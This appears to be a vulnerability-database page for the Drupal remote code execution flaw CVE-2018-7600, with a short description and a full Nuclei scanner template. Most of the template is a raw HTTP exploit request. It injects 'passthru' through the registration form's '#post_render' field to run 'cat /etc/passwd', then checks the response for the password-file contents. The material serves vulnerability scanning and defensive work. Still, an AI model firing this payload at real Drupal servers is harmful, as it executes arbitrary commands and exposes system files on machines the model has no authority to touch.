CVE-2018-7600: Drupal - Remote Code Execution

日期: 2025-08-01 | 影响软件: Drupal | POC: 已公开

漏洞描述

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

PoC代码[已公开]

id: CVE-2018-7600

info:
  name: Drupal - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
  impact: |
    Critical
  remediation: |
    Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7600
    - https://www.drupal.org/sa-core-2018-002
    - https://groups.drupal.org/security/faq-2018-002
    - http://www.securitytracker.com/id/1040598
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7600
    cwe-id: CWE-20
    epss-score: 0.9447
    epss-percentile: 0.99996
    cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: drupal
    product: drupal
    shodan-query:
      - http.component:"drupal"
      - cpe:"cpe:2.3:a:drupal:drupal"
  tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive

http:
  - raw:
      - |
        POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
        Host:  {{Hostname}}
        Accept: application/json
        Referer:  {{Hostname}}/user/register
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663

        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#post_render][]"

        passthru
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#type]"

        markup
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#markup]"

        cat /etc/passwd
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="form_id"

        user_register_form
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="_drupal_ajax"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - application/json

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402206da66cdea23838f83109d31f25f16adc68a1c76507f39239ab58f0e94241f5ef02204adef89ad340b54dec8d7586ea9183685678a4ac50a938419354677ce4c798ad:922c64590222798bb761d5b6d8e72950

相关漏洞推荐